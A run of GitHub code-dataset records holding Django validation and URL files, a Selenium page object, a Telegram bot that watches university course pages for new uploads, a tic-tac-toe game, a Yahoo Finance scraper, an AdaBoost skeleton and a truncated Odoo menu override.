e:\n return False,str(e)\n\n\ndef check_extra_information(request_data):\n if request_data['is_part_number']:\n status,message = check_start_end_numeric(request_data['part_number_start_at'],request_data['part_number_end_at'],\"Part Number\")\n if status==False:\n return status,message\n status, substring = genrate_substring(request_data['part_number_start_at'],\n request_data['part_number_end_at'], request_data['pattern_sample'])\n if status==False:\n status, message\n if substring != request_data['part_number']:\n return False,\"Part no is not matching\"\n if request_data['is_vendor_code']==True:\n status, message = check_start_end_numeric(request_data['vendor_code_start_at'],\n request_data['vendor_code_end_at'],\"Vendor Code\")\n if status == False:\n return status, message\n status, substring = genrate_substring(request_data['vendor_code_start_at'],\n request_data['vendor_code_end_at'], request_data['pattern_sample'])\n if status == False:\n status, message\n if substring != request_data['vendor_code']:\n return False, \"Vendor code is not matching\"\n if request_data['is_batch_code']:\n status, message = check_start_end_numeric(request_data['batch_code_start_at'],\n request_data['batch_code_end_at'],\"Batch Code\")\n if status == False:\n return status, message\n status, substring = genrate_substring(request_data['batch_code_start_at'],\n request_data['batch_code_end_at'], request_data['pattern_sample'])\n if status == False:\n status, message\n if substring != request_data['batch_code']:\n return False, \"Vendor code is not matching\"\n return True,\"\"\n\ndef check_start_end_numeric(start_at,end_at,request_key):\n try:\n if type(start_at) == str and start_at.isnumeric() == False:\n return False, request_key+\" start at should be numeric\"\n if type(end_at) == str and end_at.isnumeric() == False:\n return False, request_key+\" end at should be numeric\"\n if int(start_at) >= int(end_at):\n return False, request_key+\" start at should be less than end at\"\n return True,\"\"\n except Exception as e:\n return False,str(e)\n\ndef genrate_substring(start_at,end_at,original_string):\n try:\n #original_string = \" \"+original_string\n start_at = int(start_at)-1\n end_at = int(end_at)\n return True,original_string[start_at:end_at]\n except Exception as e:\n return False, str(e)\ndef get_user_name_from_token(request):\n user_name = request.META['user_name']\n if not user_name:\n return False\n return True,user_name\n\n","repo_name":"surajpttl/python-ci-cd","sub_path":"barcode_pattern_app/validations.py","file_name":"validations.py","file_ext":"py","file_size_in_byte":5705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31553386950","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n # Examples:\n #courier\n url(r'^courier','front.views.courier_request', name='courier_request'),\n url(r'^cou','front.views.courier_res',name='courier_res'),\n #\n url(r'^user','front.views.user_login',name='user_login'),\n url(r'^response','front.views.user_response', name='user_response'),\n url(r'^edata','front.views.hello'),\n url(r'^adminu','front.views.adminuser'),\n \n url(r'^about','front.views.abt'),\n url(r'^depots','front.views.depot'),\n url(r'^fares','front.views.fare'),\n\n url(r'^bushire$','front.views.ebushire'),\n url(r'^bushire-submit','front.views.ebushiresubmit'),\n #homepage\n url(r'^home','front.views.home'),\n url(r'^bhome','front.views.homepbus'),\n url(r'^chome','front.views.homepcourier'),\n #\n url(r'^search','front.views.search'),\n url(r'^xyz', 'front.views.adhome'),\n url(r'^details', 'front.views.adminuser'),\n url(r'^cdetails', 'front.views.hello'),\n url(r'^admin', 'front.views.login'), #admin-login\n url(r'^wqr', 'front.views.my'),\n url(r'^book', 'front.views.seat'),\n url(r'^dbusreq', 'front.views.bush'),\n url(r'^admin/', include(admin.site.urls)),\n]\n","repo_name":"AshnaAN/project","sub_path":"ksrtc/ksrtc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12652833556","text":"from selenium.webdriver.common.by import By\nfrom pages.base_page import BasePage\n\n\nclass FiltersPage(BasePage):\n SELECT_DISCOUNT = (By.XPATH, '//ul[@id=\"DiscountLevel\"]/li[2]/a')\n SEARCH_RESULTS = (By.XPATH, '//div[@class=\"hidden-sm element-count text-nowrap\"]')\n\n def select_discount(self):\n self.wait_and_click_element_by_selector(*self.SELECT_DISCOUNT)\n\n def filter_search_results(self):\n search_results = self.chrome.find_element(*self.SEARCH_RESULTS)\n number_of_products_text = search_results.text.strip().split()[0]\n number_of_products = float(number_of_products_text.replace('.', ''))\n assert number_of_products > 1000, \\\n \"Error, the number of search results does not meet expectations.\"\n","repo_name":"gHINDAOANUiUSTIN/Proiect-final-BDD-Elefant","sub_path":"pages/filters_page.py","file_name":"filters_page.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71656690769","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nUnistudiumListener - Telegram Bot\nAuthor: CoffeeStraw\n\"\"\"\nimport os\nimport re\nimport time\nimport requests\nimport threading\n\nimport logging\nimport colorama\nfrom colorama import Fore, Style\n\nfrom telegram import (ReplyKeyboardMarkup, ReplyKeyboardRemove,\n InlineKeyboardButton, InlineKeyboardMarkup, ChatAction, ParseMode)\nfrom telegram.ext import (Updater, CommandHandler, MessageHandler, Filters, RegexHandler,\n ConversationHandler, CallbackQueryHandler, PicklePersistence)\n\nimport unistudium_framework as uni\nfrom settings import TOKEN, UPD_TIME, MAIN_URL\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# Create PicklePersistence object\npp = PicklePersistence(filename='ul_data.pickle', on_flush=True)\n\n\n\ndef start(update, context):\n start_msg = \"*Benvenuto a* @UnistudiumListenerBot.\\n\"\\\n \"Questo bot ti terrà aggiornato in tempo reale sui nuovi caricamenti effettuati dai docenti \"\\\n \"nei rispettivi corsi presenti sulla piattaforma Unistudium.\\n\\n\"\\\n \"_Il bot è da considerarsi non ufficiale, né KITLab né Unipg sono responsabili in alcun modo._\"\n\n update.message.reply_markdown(start_msg)\n\n # We have a new user, add it to the pickle file\n pp.flush()\n\n return ConversationHandler.END\n\n\ndef help_list(update, context):\n help_msg = \"Questa è una lista degli attuali *comandi* presenti nel bot:\\n\\n\"\\\n \"- /cancel: Annulla un comando in esecuzione\\n\\n\"\\\n \"- /info: Informazioni utili sul bot e sulla pagina ufficiale GitHub\\n\\n\"\\\n \"- /login: Effettua il Login sul portale Unistudium chiedendo le credenziali\\n\\n\"\\\n \"- /logout: Cancella ogni dato personale raccolto dal Bot, compresa la sessione corrente ed effettuando quindi il Logout dal portale\\n\\n\"\\\n \"- /notifications: Permette di selezionare un corso e abilitare/disabilitare le sue notifiche\\n\\n\"\\\n \"- /viewfiles: Permette di visualizzare una lista di tutti i files presenti in un determinato corso\\n\\n\"\\\n \"- /viewnews: Permette di visualizzare una lista delle news presenti nella sezione \\\"Annunci\\\" di un corso e leggerne il contenuto\"\n update.message.reply_markdown(help_msg)\n\n return ConversationHandler.END\n\n\ndef info(update, context):\n info_msg = \"*UnistudiumListener* è il miglior metodo per tenerti sempre aggiornato sugli ultimi argomenti \"\\\n \"caricati dai docenti su *Unistudium.*\\nL'intero codice sorgente è totalmente open ed è \"\\\n \"consultabile sulla pagina GitHub del creatore di questo bot.\\n\\n\"\n keyboard = [[InlineKeyboardButton(\"GitHub\", url='https://github.com/CoffeeStraw/UnistudiumListenerBot')]]\n update.message.reply_markdown(info_msg, reply_markup=InlineKeyboardMarkup(keyboard))\n\n return ConversationHandler.END\n\n\ndef login(update, context):\n \"\"\"\n Command to perform a login on the Unistudium Portal\n \"\"\"\n send_user_pwd = 'Inserisci il tuo *username* e la tua *password* nel seguente formato (con un solo spazio in mezzo):\\n\\n'\\\n 'username password\\n\\n'\\\n '_Si ricorda che il bot cancellerà immediatamente il messaggio inviato non appena sarà stato effettuato il login, per questioni di Privacy._'\n\n update.message.reply_markdown(send_user_pwd)\n return 1\n\n\ndef login_1(update, context):\n # Save credentials\n context.user_data['credentials'] = {}\n\n # Getting username and password from message's text\n user_pass = update.message.text.split(' ')\n\n # Delete user message\n context.bot.delete_message(chat_id=update.effective_message.chat_id, message_id=update.message.message_id)\n\n if len(user_pass) == 2:\n context.user_data['credentials']['username'], context.user_data['credentials']['password'] = user_pass\n else:\n update.message.reply_markdown(\"Non hai *formattato correttamente* le tue credenziali, riprova.\", reply_markup=ReplyKeyboardRemove())\n return 1\n\n # Send a message to the user to let him wait\n update.message.reply_text(\"Tentativo di connessione in corso, attendere...\")\n context.bot.send_chat_action(chat_id=update.effective_message.chat_id, action=ChatAction.TYPING)\n\n # Try login\n response = uni.reconnect(context.user_data)\n if response != \"OK\":\n update.message.reply_markdown(response, reply_markup=ReplyKeyboardRemove())\n return 1\n\n # Getting Name and Surname of the user just to show that login was performed correctly\n main_page = context.user_data['session'].get(MAIN_URL)\n\n pattern = \"(.+?)\"\n name = re.findall(pattern, str(main_page.content))[0]\n\n update.message.reply_markdown(\"Sono riuscito a collegarmi, benvenuto *%s*!\" % name.title())\n \n # Update pickle file\n pp.flush()\n\n return ConversationHandler.END\n\n\ndef logout(update, context):\n \"\"\"\n Remove all the user's data from the pickle file\n \"\"\"\n # Delete all\n for key in list(context.user_data): # Using a list to prevent RuntimeError, since user_data could change during iterations\n del context.user_data[key]\n\n # Update pickle file\n pp.flush()\n\n # Notification message\n update.message.reply_markdown(\"Tutti i dati che erano presenti (credenziali, corsi seguiti, preferenze) sono stati rimossi con successo.\\n\\n\"\\\n \"_Questo comporta anche che non riceverai più alcuna notifica nel caso seguissi precedentemente qualche corso._\")\n return ConversationHandler.END\n\n\ndef notifications(update, context):\n # If the user hasn't requested the list of the courses already, we get it using the unistudium framework\n response = uni.reconnect(context.user_data)\n if response != \"OK\":\n # Error\n update.message.reply_markdown(response, reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n # Check if the list of the courses is available\n if 'courses' not in context.user_data:\n context.user_data['courses'] = uni.get_courseslist(context.user_data)\n\n # Send message with list of courses to the user\n choose_course_view_files = 'Seleziona il corso di cui vuoi abilitare/disabilitare notifiche'\n reply_keyboard = [[\"%s %s\" % (context.user_data['courses'][course_name]['followed'], course_name)] for course_name in context.user_data['courses'].keys()]\n update.message.reply_text(choose_course_view_files, reply_markup=ReplyKeyboardMarkup(reply_keyboard))\n \n # Update pickle file\n pp.flush()\n \n return 1\n\n\ndef notifications_1(update, context):\n course_name = update.message.text[2:]\n\n # Check for course name validity\n try:\n if context.user_data['courses'][course_name]['followed'] == '🔕':\n context.user_data['courses'][course_name]['followed'] = '🔔'\n update.message.reply_markdown('Riprenderai a ricevere le notifiche dal corso di ' + course_name, reply_markup=ReplyKeyboardRemove())\n else:\n context.user_data['courses'][course_name]['followed'] = '🔕'\n update.message.reply_markdown('Non riceverai più notifiche dal corso di ' + course_name, reply_markup=ReplyKeyboardRemove())\n except KeyError:\n no_course = 'Non è presente un corso con quel nome, riprova.'\n update.message.reply_text(no_course)\n return 1\n\n return ConversationHandler.END\n\n\ndef viewfiles(update, context):\n \"\"\"\n Request a list of files of a specific course in Unistudium\n \"\"\"\n # If the user hasn't requested the list of the courses already, we get it using the unistudium framework\n response = uni.reconnect(context.user_data)\n if response != \"OK\":\n # Error\n update.message.reply_markdown(response, reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n # Check if the list of the courses is available\n if 'courses' not in context.user_data:\n context.user_data['courses'] = uni.get_courseslist(context.user_data)\n\n # Send message with list of courses to the user\n choose_course_view_files = 'Seleziona il corso di cui vuoi vedere i files caricati'\n reply_keyboard = [[\"%s %s\" % (context.user_data['courses'][course_name]['followed'], course_name)] for course_name in context.user_data['courses'].keys()]\n update.message.reply_text(choose_course_view_files, reply_markup=ReplyKeyboardMarkup(reply_keyboard))\n \n # Update pickle file\n pp.flush()\n \n return 1\n\n\ndef viewfiles_1(update, context):\n course_name = update.message.text[2:]\n\n # Check for course name validity\n try:\n course_urls = context.user_data['courses'][course_name]\n except KeyError:\n no_course = 'Non è presente un corso con quel nome, riprova.'\n update.message.reply_text(no_course)\n return 1\n\n # Get list of files from Unistudium website\n files_list = uni.get_course_fileslist(context.user_data, course_urls['url'])\n context.user_data['courses'][course_name]['fileslist'] = files_list\n \n # Format the fileslist\n custom_mex = 'Ecco tutti i file che ho trovato nel corso di *%s*:\\n\\n' % course_name\n mexs = uni.get_formatted_fileslist(files_list, custom_mex)\n\n # Send list of files to the user\n for mex in mexs:\n update.message.reply_markdown(mex, reply_markup=ReplyKeyboardRemove())\n\n # Save in the pickle file\n pp.flush()\n\n return ConversationHandler.END\n\n\ndef viewnews(update, context):\n \"\"\"\n view news from unistudium\n \"\"\"\n # If the user hasn't requested the list of the courses already, we get it using the unistudium framework\n response = uni.reconnect(context.user_data)\n if response != \"OK\":\n # Error\n update.message.reply_markdown(response, reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n # Check if the list of the courses is available\n if 'courses' not in context.user_data:\n context.user_data['courses'] = uni.get_courseslist(context.user_data)\n\n # Send message with list of courses to the user\n choose_course_view_news = 'Seleziona il corso di cui vuoi vedere le news caricate'\n reply_keyboard = [[\"%s %s\" % (context.user_data['courses'][course_name]['followed'], course_name)] for course_name in context.user_data['courses'].keys()]\n update.message.reply_text(choose_course_view_news, reply_markup=ReplyKeyboardMarkup(reply_keyboard))\n\n # Save in the pickle file\n pp.flush()\n\n return 1\n\n\ndef viewnews_1(update, context):\n course_name = update.message.text[2:]\n\n # Check for course name validity\n try:\n course_urls = context.user_data['courses'][course_name]\n except KeyError:\n no_course = 'Non è presente un corso con quel nome, riprova.'\n update.message.reply_text(no_course)\n return 1\n\n # Check news availability\n course_news = uni.get_forum_news(context.user_data, course_urls['forum_url'])\n context.user_data['courses'][course_name]['newslist'] = course_news\n if not course_news:\n no_news = 'Non è presente alcuna notizia nella pagina della materia scelta.'\n update.message.reply_text(no_news, reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n # Save course selected for the next step\n context.user_data['course_selected'] = course_name\n\n # Send message to the user\n choose_news = 'Seleziona la news di cui vuoi vedere il contenuto'\n reply_keyboard = [[news_name] for news_name in course_news.keys()]\n update.message.reply_text(choose_news, reply_markup=ReplyKeyboardMarkup(reply_keyboard))\n\n # Save in the pickle file\n pp.flush()\n\n return 2\n\n\ndef viewnews_2(update, context):\n news_name = update.message.text\n \n try:\n course_name = context.user_data['course_selected']\n news = context.user_data['courses'][course_name]['newslist'][news_name]\n del context.user_data['course_selected']\n except KeyError:\n no_news = 'La notizia indicata non esiste, riprova.'\n update.message.reply_text(no_news)\n return 2\n \n news_msg = uni.get_news_msg(context.user_data, news)\n update.message.reply_text(news_msg, reply_markup=ReplyKeyboardRemove())\n\n # Save in the pickle file\n pp.flush()\n\n return ConversationHandler.END\n\n\ndef cancel(update, context):\n \"\"\"\n Undo any command which is going on\n \"\"\"\n update.message.reply_text('Ok, comando annullato.',reply_markup=ReplyKeyboardRemove())\n return ConversationHandler.END\n\n\ndef error(update, error):\n \"\"\"\n Log Errors caused by Updates\n \"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, error)\n\n\ndef callback_query(update, context):\n query = update.callback_query\n query.answer(\"Done\")\n\n\ndef listen(bot, dp, upd_time):\n \"\"\"\n Listen for updates of files and news on Unistudium\n \"\"\"\n while True:\n print(Fore.CYAN + \"Controllo per nuovi updates...\")\n\n for uid in dp.user_data:\n # To Debug the listen function, uncomment carefully these lines\n # del dp.user_data[uid]['courses']['INGEGNERIA DEL SOFTWARE (2018/19)']['fileslist'][0][1][3]\n # dp.user_data[uid]['courses']['INGEGNERIA DEL SOFTWARE (2018/19)']['fileslist'][1][1] = []\n # quit()\n\n # Check if the server is online and the credentials are valid\n response = uni.reconnect(dp.user_data[uid])\n if response != \"OK\":\n continue\n\n # Download courses list if it doesn't exist\n if 'courses' not in dp.user_data[uid]:\n dp.user_data[uid]['courses'] = uni.get_courseslist(dp.user_data[uid])\n pp.flush()\n\n for course in dp.user_data[uid]['courses']:\n if dp.user_data[uid]['courses'][course]['followed'] == '🔕':\n # Skip this course for this user\n continue\n\n # Get the most updated files list\n new_files_list = uni.get_course_fileslist(dp.user_data[uid], dp.user_data[uid]['courses'][course]['url'])\n \n # Check if I don't have a previous version\n if not 'fileslist' in dp.user_data[uid]['courses'][course]:\n dp.user_data[uid]['courses'][course]['fileslist'] = new_files_list\n pp.flush()\n continue\n \n old_files_list = dp.user_data[uid]['courses'][course]['fileslist']\n \n # Find the differences between these two lists\n def find_diff(first_list, second_list):\n diffs = []\n # Iterate over the sections\n for first_sec in first_list:\n for second_sec in second_list:\n # If the section name is the same, we could find diffs\n if first_sec[0] == second_sec[0]:\n file_diffs = []\n for file2 in first_sec[1]:\n for file1 in second_sec[1]:\n if file2 == file1:\n break\n else:\n file_diffs.append(file2)\n if file_diffs:\n diffs.append([first_sec[0], file_diffs])\n break\n else:\n # This is a new section, add it to the diffs\n diffs.append(first_sec)\n return diffs\n\n # Find additions and removes\n additions = find_diff(new_files_list, old_files_list)\n removes = find_diff(old_files_list, new_files_list)\n\n # Get the most updated forum news\n # TO DO\n\n # Notify all the users \"registered\" of the updates\n if additions or removes:\n # Update data\n dp.user_data[uid]['courses'][course]['fileslist'] = new_files_list\n pp.flush()\n print(Fore.GREEN + \"Ho trovato nuovi updates nel corso di %s (per uid: %d)\" % (course, uid))\n\n # If we have both additions and removes\n new_upd_msg = \"Ciao, ho trovato dei nuovi aggiornamenti nel corso di:\\n*{}*\".format(course)\n if additions and removes:\n custom_mex = new_upd_msg + \"\\n\\n📎 *Files aggiunti:*\\n\\n\"\n mexs = uni.get_formatted_fileslist(additions, custom_mex)\n\n for mex in mexs:\n bot.sendMessage(uid, mex, parse_mode=ParseMode.MARKDOWN)\n\n custom_mex = \"💣 *Files rimossi:*\\n\\n\"\n mexs = uni.get_formatted_fileslist(removes, custom_mex)\n\n for mex in mexs:\n bot.sendMessage(uid, mex, parse_mode=ParseMode.MARKDOWN)\n elif additions:\n custom_mex = new_upd_msg + \"\\n\\n📎 *Files aggiunti:*\\n\\n\"\n mexs = uni.get_formatted_fileslist(additions, custom_mex)\n\n for mex in mexs:\n bot.sendMessage(uid, mex, parse_mode=ParseMode.MARKDOWN)\n elif removes:\n custom_mex = new_upd_msg + \"\\n\\n💣 *Files rimossi:*\\n\\n\"\n mexs = uni.get_formatted_fileslist(removes, custom_mex)\n\n for mex in mexs:\n bot.sendMessage(uid, mex, parse_mode=ParseMode.MARKDOWN)\n\n # Wait for a bit, then check for updates once more\n print(Fore.CYAN + \"Aspetto per altri %d secondi\" % UPD_TIME)\n time.sleep(upd_time)\n\n\ndef main():\n # Setting up\n colorama.init(autoreset=True)\n\n # Create the EventHandler and pass it your bot's token.\n updater = Updater(TOKEN, persistence=pp, use_context=True)\n dp = updater.dispatcher\n\n # Adding all the handler for the commands\n cmd_login = ConversationHandler(\n entry_points=[CommandHandler('login', login)],\n\n states={\n 1: [MessageHandler(Filters.text, login_1)]\n },\n\n fallbacks=[CommandHandler('cancel', cancel)]\n )\n\n cmd_notifications = ConversationHandler(\n entry_points=[CommandHandler('notifications', notifications)],\n\n states={\n 1: [MessageHandler(Filters.text, notifications_1)]\n },\n\n fallbacks=[CommandHandler('cancel', cancel)]\n )\n\n cmd_viewfiles = ConversationHandler(\n entry_points=[CommandHandler('viewfiles', viewfiles)],\n\n states={\n 1: [MessageHandler(Filters.text | Filters.command, viewfiles_1)]\n },\n\n fallbacks=[CommandHandler('cancel', cancel)]\n )\n\n cmd_viewnews = ConversationHandler(\n entry_points=[CommandHandler('viewnews', viewnews)],\n\n states={\n 1: [MessageHandler(Filters.text, viewnews_1)],\n 2: [MessageHandler(Filters.text, viewnews_2)],\n },\n\n fallbacks=[CommandHandler('cancel', cancel)]\n )\n\n dp.add_handler(CommandHandler('start', start))\n dp.add_handler(CommandHandler('help', help_list))\n dp.add_handler(CommandHandler('info', info))\n dp.add_handler(CommandHandler('logout', logout))\n dp.add_handler(cmd_login)\n dp.add_handler(cmd_notifications)\n dp.add_handler(cmd_viewfiles)\n dp.add_handler(cmd_viewnews)\n dp.add_handler(CommandHandler('cancel', cancel))\n\n # Adding callback_query handler\n dp.add_handler(CallbackQueryHandler(callback_query))\n # Log all errors\n dp.add_error_handler(error)\n\n # Start the Bot\n updater.start_polling()\n print(\"Ready to work.\")\n\n # Start the listener for new files in courses' page\n listener = threading.Thread(target=listen, args=(updater.bot, dp, UPD_TIME))\n listener.start()\n \n # Run the bot until you press Ctrl-C or the process receives SIGINT, SIGTERM or SIGABRT.\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CoffeeStraw/UnistudiumListenerBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20267,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"9603142896","text":"def create_board(board):\n '''Create a board with three rows and three columns.'''\n for row in board:\n print('|', end=\"\")\n for slot in row:\n print(f\" {slot} \", end=\"|\")\n print()\n\n\ndef check_move(move):\n '''Check if user move equal to number and not out of board.'''\n if not move.isnumeric() or int(move) > 9 or int(move) < 1:\n print(\"This's not a valid position!\")\n return False\n else:\n return True\n\n\ndef occupied_box(coords, board):\n '''Check if user move is on a free position.'''\n row = coords[0]\n col = coords[1]\n if board[row][col] != \"_\":\n print(\"This box is already occupied!\")\n return True\n else:\n return False\n\n\ndef coordinates(move):\n '''Determine row and column according to user move.'''\n row = int(move / 3)\n col = move\n if col > 2:\n col = int(col % 3)\n return (row, col)\n\n\ndef add_to_board(coords, board, active_user):\n '''Add user move to a position on a board.'''\n row = coords[0]\n col = coords[1]\n board[row][col] = active_user\n\n\ndef current_user(user):\n '''Define which user has to make a move.'''\n if user:\n return \"X\"\n else:\n return \"O\"\n\n\ndef is_win(user, board):\n '''Check winning positions.'''\n if check_row(user, board):\n return True\n if check_col(user, board):\n return True\n if check_diag(user, board):\n return True\n return False\n\n\ndef check_row(user, board):\n for row in board:\n complete_row = True\n for slot in row:\n if slot != user:\n complete_row = False\n break\n if complete_row:\n return True\n return False\n\n\ndef check_col(user, board):\n for col in range(3):\n complete_col = True\n for row in range(3):\n if board[row][col] != user:\n complete_col = False\n break\n if complete_col:\n return True\n return False\n\n\ndef check_diag(user, board):\n if board[0][0] == user and board[1][1] == user and board[2][2] == user:\n return True\n elif board[0][2] == user and board[1][1] == user and board[2][0] == user:\n return True\n else:\n return False\n\ndef new_game():\n '''Offer user to restart the game or to quit.'''\n to_continue = input(\"Do you want to start new game. Type 'Y' or 'N': \").upper()\n if to_continue == 'Y':\n tic_toc_toe()\n else:\n print('GAME OVER')\n\n\n\ndef tic_toc_toe():\n print(\"WELCOME TO TIC TOC TOE! CAll A FRIEND AND HAVE FUN!\")\n board = [\n [\"_\", \"_\", \"_\"],\n [\"_\", \"_\", \"_\"],\n [\"_\", \"_\", \"_\"]\n ]\n user = True\n turns = 0\n\n while turns < 9:\n active_user = current_user(user)\n create_board(board)\n if turns == 0 or turns % 2 == 0:\n move = input(\"Player 'X' make your move to a position from 1 through 9: \")\n else:\n move = input(\"Player 'O' make your move to a position from 1 through 9: \")\n if not check_move(move):\n print(\"Please try again.\")\n continue\n move = int(move) - 1\n coords = coordinates(move)\n if occupied_box(coords, board):\n print(\"Please try again\")\n continue\n add_to_board(coords, board, active_user)\n if is_win(active_user, board):\n print(f\"Player '{active_user.upper()}' won!\")\n create_board(board)\n new_game()\n break\n\n turns += 1\n if turns == 9:\n print(\"Draw!\")\n create_board(board)\n new_game()\n user = not user\n\n\ntic_toc_toe()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"IlonaBrushnovska/Tic-tac-toe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29660872427","text":"#scrape.py\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport pandas as pd\n\n\ndef get_most_active():\n url = 'https://finance.yahoo.com/trending-tickers'\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\"\n }\n ticker_data = {}\n r = requests.get(url, headers=headers)\n data = r.text \n soup = BeautifulSoup (data, 'html.parser')\n alldata = soup.find_all('tr', class_='simpTblRow Bgc($hoverBgColor):h BdB Bdbc($seperatorColor) Bdbc($tableBorderBlue):h H(32px) Bgc($lv2BgColor)')\n table1 = alldata[0]\n for cols in alldata:\n t = cols.find_all('td')\n cells = cols.find_all('fin-streamer')\n if cells:\n ticker = t[0].text\n name = t[1].text\n value = t[2].text\n time = t[3].text\n change = t[4].text\n percent_change = t[5].text\n volume = t[6].text\n market_cap = t[7].text\n ticker_data[ticker] = {\n 'name': name,\n 'value': value,\n 'time': time,\n 'change': change,\n 'percent_change': percent_change,\n 'volume': volume,\n 'market_cap': market_cap,\n }\n return ticker_data\n\n\ndef create_df():\n ticker_data = get_most_active()\n stock_data = []\n for ticker, data in ticker_data.items():\n value = get_value(data)\n timestamp = pd.Timestamp.now()\n stock_data.append({\n 'timestamp': timestamp,\n 'ticker': ticker,\n 'name': data['name'],\n 'value': value,\n 'time': data['time'],\n 'change': data['change'],\n 'percent_change': data['percent_change'],\n 'volume': data['volume'],\n 'market_cap': data['market_cap']\n })\n df = pd.DataFrame(stock_data)\n return df\n\n\ndef get_all_names():\n ticker_data = get_most_active()\n ticker_names = []\n for ticker, data in ticker_data.items():\n ticker_names.append(data['name'])\n return ticker_names\n\n\ndef get_biggest_movers():\n ticker_data = get_most_active()\n # Sort the ticker data by absolute value of percent change\n sorted_ticker_data = sorted(ticker_data.items(), key=lambda x: abs(float(x[1]['percent_change'][:-1])), reverse=True)\n biggest_movers = []\n for ticker, data in sorted_ticker_data[:5]:\n biggest_movers.append((ticker, data['percent_change']))\n return biggest_movers\n\n\ndef get_name(ticker_name):\n return ticker_name['name']\n\n\ndef get_value(ticker_name):\n return ticker_name['value']\n\n\ndef get_time(ticker_name):\n return ticker_name['time']\n\n\ndef get_change(ticker_name):\n return ticker_name['change']\n\n\ndef get_percent_change(ticker_name):\n return ticker_name['percent_change']\n\n\ndef get_volume(ticker_name):\n return ticker_name['volume']\n\n\ndef get_market_cap(ticker_name):\n return ticker_name['market_cap']\n","repo_name":"alogan1259/trending_tickers_api","sub_path":"api/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33694376712","text":"\"\"\"\n===================================================\n Introduction to Machine Learning (67577)\n===================================================\n\nSkeleton for the AdaBoost classifier.\n\nAuthor: Noga Zaslavsky\nEdited: Yoav Wald, May 2018\n\n\"\"\"\nimport numpy as np\n\nclass AdaBoost(object):\n\n def __init__(self, WL, T):\n \"\"\"\n Parameters\n ----------\n WL : the class of the base weak learner\n T : the number of base learners to learn\n \"\"\"\n self.WL = WL\n self.T = T\n self.h = [None]*T # list of base learners\n self.w = np.zeros(T) # weights\n\n def train(self, X, y):\n \"\"\"\n Train this classifier over the sample (X,y)\n \"\"\"\n m, d = X.shape\n D = np.full(m, 1/m)\n for i in range(self.T):\n self.h[i] = self.WL(D, X, y)\n error_i = np.dot(D, (y != self.h[i].predict(X)))\n self.w[i] = 0.5 * np.log((1/error_i) - 1)\n y_hat = self.h[i].predict(X)\n D = (D * np.exp(-self.w[i] * y * y_hat)) / (D * np.exp(-self.w[i] * y * y_hat)).sum()\n\n def predict(self, X):\n \"\"\"\n Returns\n -------\n y_hat : a prediction vector for X\n \"\"\"\n temp = []\n for t in range(self.T):\n temp.append(np.dot(self.w[t], self.h[t].predict(X)))\n return np.sign(np.array(temp).sum(axis=0))\n\n def error(self, X, y):\n \"\"\"\n Returns\n -------\n the error of this classifier over the sample (X,y)\n \"\"\"\n y_hat = self.predict(X)\n y = np.array(y)\n return sum(y[i] != y_hat[i] for i in range(len(y)))/len(y)\n\n","repo_name":"TomEliassy/Machine-Learning","sub_path":"ex2 - Adaboost, Bagging, Decision Tree/adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37578263266","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import api, fields, models, tools, _\r\nimport operator\r\n\r\n\r\nclass IrUiMenu(models.Model):\r\n _inherit = \"ir.ui.menu\"\r\n \r\n category_id = fields.Many2one('ir.ui.menu.category', string=\"Category\")\r\n \r\n @api.model\r\n @tools.ormcache_context('self._uid', 'debug', keys=('lang',))\r\n def load_menus(self, debug):\r\n \"\"\"[summary]\r\n 加载所有菜单项(所有应用程序及其子菜单)。\r\n odoo/addons/base/models/ir_ui_menu.py\r\n \r\n :return:菜单根目录\r\n :rtype:dict('children':菜单\\节点)\r\n \"\"\"\r\n \r\n fields = ['name', 'sequence', 'parent_id', 'action', 'web_icon', 'web_icon_data', 'category_id'] #增加category_id字段\r\n menu_roots = self.get_user_roots()\r\n menu_roots_data = menu_roots.read(fields) if menu_roots else []\r\n menu_root = {\r\n 'id': False,\r\n 'name': 'root',\r\n 'parent_id': [-1, ''],\r\n 'children': menu_roots_data,\r\n 'all_menu_ids': menu_roots.ids,\r\n }\r\n\r\n if not menu_roots_data:\r\n return menu_root\r\n\r\n # 与常规树视图不同,菜单完全加载,因为项目数量有限(安装所有6.1插件时为752个)\r\n menus = self.search([('id', 'child_of', menu_roots.ids)])\r\n menu_items = menus.read(fields)\r\n\r\n # 在序列的末尾添加根,这样当放入id:item映射时,它们将覆盖从完整菜单读取的等效菜单项,从而在根上正确设置子菜单项。\r\n menu_items.extend(menu_roots_data)\r\n menu_root['all_menu_ids'] = menus.ids # 包括菜单根!\r\n\r\n # 使用parent_id创建树\r\n menu_items_map = 